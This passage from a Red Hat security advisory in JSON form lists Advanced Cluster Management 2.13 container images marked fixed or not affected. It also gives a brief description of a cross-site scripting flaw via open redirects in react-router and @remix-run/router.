"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428412"
}
],
"notes": [
{
"category": "description",
"text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
